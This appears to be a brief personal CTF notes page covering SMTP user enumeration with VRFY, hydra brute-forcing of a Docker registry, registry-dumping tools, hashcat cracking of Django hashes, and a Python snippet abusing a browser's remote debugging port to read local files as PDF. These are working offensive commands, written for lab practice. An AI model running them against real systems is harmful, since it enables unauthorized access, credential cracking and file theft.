CTF Notes: 2024-05-19 SMTP enum firefox debug port

May 19, 2024

1 min read

common smtp enum techniques

using VRFY

> telnet target 25
Trying 10.129.63.75...
Connected to target.
Escape character is '^]'.
VRFY user
220 target ESMTP Postfix (Debian/GNU)
252 2.0.0 user

https://www.kali.org/tools/smtp-user-enum/

common docker registry cracking

password cracking using hydra

hydra -l user -P /usr/share/wordlists/rockyou.txt target -s port https-get /path/

grabs docker registry info: https://github.com/Syzik/DockerRegistryGrabber

python3 drg.py http://target -U user -P pass --dump_all

mass fetch blobs: https://github.com/NotSoSecure/docker_fetch

python2 docker_image_fetch.py -u https://user:pass@target:port

common hashcat cracking of hashes in db

django hashes

hashcat.exe -m 10000 hash.txt rockyou.txt

practical guide on exploiting –remote-debugging-port

if there is a browser process running in headless mode with a --remote-debugging-port, there is a potential to exploit it.

forward the port to local

ssh -L port:127.0.0.1:port user@target

run a chromium browser and go to chrome://inspect, then setup to listen on 127.0.0.1:port
you should see some traffics from the remote browser already
use pycdp to open a page via the debugging port and save to pdf
https://github.com/HMaker/python-cdp

...
    conn = await connect_cdp('http://localhost:port')
    target_id = await conn.execute(cdp.target.create_target('file:///file'))
    target_session = await conn.connect_session(target_id)
    await target_session.execute(cdp.page.enable())
    r = await target_session.execute(cdp.page.print_to_pdf())
    print(r)
...

convert the base64 string to a pdf file